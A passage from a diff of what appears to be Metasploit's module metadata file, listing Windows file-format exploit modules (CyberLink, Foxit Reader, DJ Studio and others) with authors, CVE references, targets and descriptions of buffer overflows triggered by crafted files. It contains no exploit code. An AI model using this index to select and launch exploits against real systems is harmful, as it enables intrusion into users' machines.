This results in overwriting a\n structured exception handler record.", + "references": [ + "CVE-2011-5171", + "BID-50997", + "OSVDB-77600", + "EDB-18220", + "US-CERT-VU-158003" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CyberLink Power2Go 8 (XP/Vista/win7) Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cyberlink_p2g_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/cytel_studio_cy3": { + "name": "Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/cytel_studio_cy3", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-10-02", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found\n in Cytel Studio <= 9.0. 
The overflow is triggered during the\n copying of strings to a stack buffer of 256 bytes.", + "references": [ + "OSVDB-75991", + "BID-49924", + "URL-http://aluigi.altervista.org/adv/cytel_1-adv.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Cytel Studio 9.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/cytel_studio_cy3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/deepburner_path": { + "name": "AstonSoft DeepBurner (DBR File) Path Buffer Overflow", + "fullname": "exploit/windows/fileformat/deepburner_path", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-12-19", + "type": "exploit", + "author": [ + "Expanders", + "fl0 fl0w", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in versions 1.9.0.228,\n 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n DBR file within a browser, since the DBR extension is registered to DeepBurner.", + "references": [ + "BID-21657", + "OSVDB-32356", + "CVE-2006-6665", + "EDB-2950", + "EDB-8335", + "EDB-11315" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/deepburner_path.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/deepburner_path", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": null + }, + "exploit_windows/fileformat/destinymediaplayer16": { + "name": "Destiny Media Player 1.61 PLS M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/destinymediaplayer16", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-01-03", + "type": "exploit", + "author": [ + "Trancek " + ], + "description": "This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n An attacker must send the file to victim and the victim must open the file. File-->Open Playlist", + "references": [ + "CVE-2009-3429", + "OSVDB-53249", + "EDB-7651", + "BID-33091" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Destiny Universal", + "Windows XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/destinymediaplayer16.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/destinymediaplayer16", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/digital_music_pad_pls": { + "name": "Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/digital_music_pad_pls", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-17", + "type": "exploit", + "author": [ + "Abhishek Lyall " + ], + "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n When opening a malicious pls file with the Digital Music Pad,\n a remote attacker could overflow a buffer and execute\n arbitrary code.", + "references": [ + "OSVDB-68178", + "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519", + "EDB-15134" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2" + ], + 
"mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/digital_music_pad_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/djstudio_pls_bof": { + "name": "DJ Studio Pro 5.1 .pls Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/djstudio_pls_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-30", + "type": "exploit", + "author": [ + "Sebastien Duquette", + "Death-Shadow-Dark " + ], + "description": "This module exploits a stack-based buffer overflow in DJ Studio Pro 5.1.6.5.2.\n When handling a .pls file, DJ Studio will copy the user-supplied data on the stack\n without any proper bounds checking done beforehand, therefore allowing code\n execution under the context of the user.", + "references": [ + "CVE-2009-4656", + "OSVDB-58159", + "EDB-10827" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DJ Studio Pro 5.1.6.5.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/djstudio_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/djstudio_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/djvu_imageurl": { + "name": "DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow", + "fullname": "exploit/windows/fileformat/djvu_imageurl", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-10-30", + "type": "exploit", + "author": [ + "dean " + ], + "description": "This module exploits a stack buffer overflow in DjVu ActiveX Component. 
When sending an\n overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.", + "references": [ + "CVE-2008-4922", + "OSVDB-49592", + "BID-31987" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/djvu_imageurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/documalis_pdf_editor_and_scanner": { + "name": "Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/documalis_pdf_editor_and_scanner", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-05-22", + "type": "exploit", + "author": [ + "metacom", + "metacom27 " + ], + "description": "Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not\n appropriately validate the contents of JPEG images contained within a PDF. 
Attackers can exploit\n this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the\n user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10", + "Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/fileformat/documalis_pdf_editor_and_scanner.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/documalis_pdf_editor_and_scanner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/dupscout_xml": { + "name": "Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow", + "fullname": "exploit/windows/fileformat/dupscout_xml", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-29", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16\n by using the import command option to import a specially crafted xml file.", + "references": [ + "CVE-2017-7310" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/dupscout_xml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/fileformat/dvdx_plf_bof": { + "name": "DVD X Player 5.5 .plf PlayList Buffer Overflow", + "fullname": "exploit/windows/fileformat/dvdx_plf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-06-02", + "type": "exploit", + "author": [ + "n00b", + "D3r K0n!G", + "sickness", + "sinn3r " + ], + "description": "This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and\n Standard. By supplying a long string of data in a plf file (playlist), the\n MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,\n and then copy it on the stack without any proper bounds checking, which causes a\n buffer overflow, and results in arbitrary code execution under the context of the user.\n\n This module has been designed to target common Windows systems such as:\n Windows XP SP2/SP3, Windows Vista, and Windows 7.", + "references": [ + "CVE-2007-3068", + "OSVDB-36956", + "BID-24278", + "EDB-17745" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "DVD X Player 5.5 Standard / Pro" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/dvdx_plf_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/dvdx_plf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/easycdda_pls_bof": { + "name": "Easy CD-DA Recorder PLS Buffer Overflow", + "fullname": "exploit/windows/fileformat/easycdda_pls_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-06-07", + "type": "exploit", + "author": [ + "chap0", + "Gabor Seljan", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n Easy CD-DA Recorder 2007 caused by an overlong string in a playlist entry.\n By persuading the victim to open a 
specially-crafted PLS file, a\n remote attacker can execute arbitrary code on the system or cause\n the application to crash. This module has been tested successfully on\n Windows XP SP3 and Windows 7 SP1.", + "references": [ + "BID-40631", + "EDB-13761", + "OSVDB-65256", + "CVE-2010-2343", + "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows 7 SP1 (DEP Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/easycdda_pls_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/easycdda_pls_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/emc_appextender_keyworks": { + "name": "EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/emc_appextender_keyworks", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-09-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control\n (KeyHelp.ocx 1.2.3120.0). 
This ActiveX Control comes bundled with EMC's\n Documentation ApplicationXtender 5.4.", + "references": [ + "CVE-2012-2515", + "OSVDB-58423", + "BID-36546" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/emc_appextender_keyworks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/erdas_er_viewer_bof": { + "name": "ERS Viewer 2011 ERS File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/erdas_er_viewer_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-04-23", + "type": "exploit", + "author": [ + "Parvez Anwar", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2011\n (version 11.04). The vulnerability exists in the module ermapper_u.dll where the\n function ERM_convert_to_correct_webpath handles user provided data in an insecure\n way. It results in arbitrary code execution under the context of the user viewing\n a specially crafted .ers file. 
This module has been tested successfully with ERS\n Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-0726", + "OSVDB-92694", + "BID-59379", + "URL-http://web.archive.org/web/20130515231047/http://secunia.com/advisories/51725/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/erdas_er_viewer_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/erdas_er_viewer_rf_report_error": { + "name": "ERS Viewer 2013 ERS File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/erdas_er_viewer_rf_report_error", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-23", + "type": "exploit", + "author": [ + "James Fitts", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. 
This module has been tested successfully with ERS Viewer 2013 (versions\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2013-3482", + "OSVDB-93650", + "URL-http://web.archive.org/web/20130609135637/http://secunia.com:80/advisories/53620" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR", + "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/esignal_styletemplate_bof": { + "name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO", + "fullname": "exploit/windows/fileformat/esignal_styletemplate_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-09-06", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "TecR0c ", + "mr_me " + ], + "description": "The software is unable to handle the \"\" files (even those\n original included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. 
This vulnerability affects versions 10.6.2425.1208 and earlier.", + "references": [ + "CVE-2011-3494", + "OSVDB-75456", + "BID-49600", + "URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt", + "EDB-17837" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win XP SP3 / Windows Vista / Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/esignal_styletemplate_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/etrust_pestscan": { + "name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/fileformat/etrust_pestscan", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-11-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. 
When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2009-4225", + "OSVDB-60862" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/etrust_pestscan", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ezip_wizard_bof": { + "name": "eZip Wizard 3.0 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/ezip_wizard_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-09", + "type": "exploit", + "author": [ + "fl0 fl0w", + "jduck ", + "Lincoln" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially\n file via double-clicking it. 
By doing so, an attacker can execute arbitrary\n code as the victim user.", + "references": [ + "CVE-2009-1028", + "OSVDB-52815", + "BID-34044", + "URL-http://www.edisys.com/", + "EDB-8180", + "EDB-12059" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ezip_wizard_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/fatplayer_wav": { + "name": "Fat Player Media Player 0.6b0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/fatplayer_wav", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-18", + "type": "exploit", + "author": [ + "James Fitts ", + "dookie" + ], + "description": "This module exploits a buffer overflow in Fat Player 0.6b. 
When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "CVE-2009-4962", + "OSVDB-57343", + "EDB-15279" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/fatplayer_wav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/fdm_torrent": { + "name": "Free Download Manager Torrent Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/fdm_torrent", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-02-02", + "type": "exploit", + "author": [ + "SkD ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. 
Arbitrary code execution could occur when parsing a\n specially crafted torrent file.", + "references": [ + "CVE-2009-0184", + "OSVDB-54033", + "BID-33555", + "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18", + "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18", + "URL-http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5", + "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Free Download Manager 3.0 (Build 844)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/fdm_torrent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/feeddemon_opml": { + "name": "FeedDemon Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/feeddemon_opml", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-02-09", + "type": "exploit", + "author": [ + "fl0 fl0w", + "dookie", + "jduck " + ], + "description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. 
This vulnerability was originally reported\n against version 2.7 in February of 2009.", + "references": [ + "CVE-2009-0546", + "OSVDB-51753", + "BID-33630", + "EDB-7995", + "EDB-8010", + "EDB-11379" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/feeddemon_opml", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_filewrite": { + "name": "Foxit PDF Reader 4.2 Javascript File Write", + "fullname": "exploit/windows/fileformat/foxit_reader_filewrite", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-03-05", + "type": "exploit", + "author": [ + "bannedit ", + "Chris Evans" + ], + "description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. 
Kind of lame but thats how it goes sometimes in\n the world of file write bugs.", + "references": [ + "OSVDB-71104", + "URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)", + "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_filewrite", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_launch": { + "name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow", + "fullname": "exploit/windows/fileformat/foxit_reader_launch", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-03-09", + "type": "exploit", + "author": [ + "Francisco Falcon", + "bannedit " + ], + "description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from an \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.", + "references": [ + "CVE-2009-0837", + "OSVDB-55614", + "BID-34035", + "URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Foxit Reader 3.0 Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_launch", + "check": 
false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_reader_uaf": { + "name": "Foxit PDF Reader Pointer Overwrite UAF", + "fullname": "exploit/windows/fileformat/foxit_reader_uaf", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-04-20", + "type": "exploit", + "author": [ + "mr_me", + "bit from meepwn", + "saelo", + "Jacob Robles" + ], + "description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.", + "references": [ + "CVE-2018-9948", + "CVE-2018-9958", + "ZDI-18-332", + "ZDI-18-342", + "URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html", + "URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 10 Pro x64 Build 17134" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_reader_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/foxit_title_bof": { + "name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow", + "fullname": 
"exploit/windows/fileformat/foxit_title_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-13", + "type": "exploit", + "author": [ + "dookie", + "Sud0", + "corelanc0d3r ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.", + "references": [ + "OSVDB-68648", + "EDB-15532", + "URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Foxit Reader v4.1.1 XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/foxit_title_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/free_mp3_ripper_wav": { + "name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/free_mp3_ripper_wav", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-08-27", + "type": "exploit", + "author": [ + "Richard Leahy", + "X-h4ck", + "Tiago Henriques", + "James Fitts " + ], + "description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. 
The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.", + "references": [ + "CVE-2011-5165", + "OSVDB-63349", + "EDB-11975", + "EDB-17727" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 EN" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/free_mp3_ripper_wav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/galan_fileformat_bof": { + "name": "gAlan 0.2.1 Buffer Overflow", + "fullname": "exploit/windows/fileformat/galan_fileformat_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-12-07", + "type": "exploit", + "author": [ + "Jeremy Brown <0xjbrown41@gmail.com>", + "loneferret" + ], + "description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.", + "references": [ + "OSVDB-60897", + "EDB-10339" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/galan_fileformat_bof", + "check": 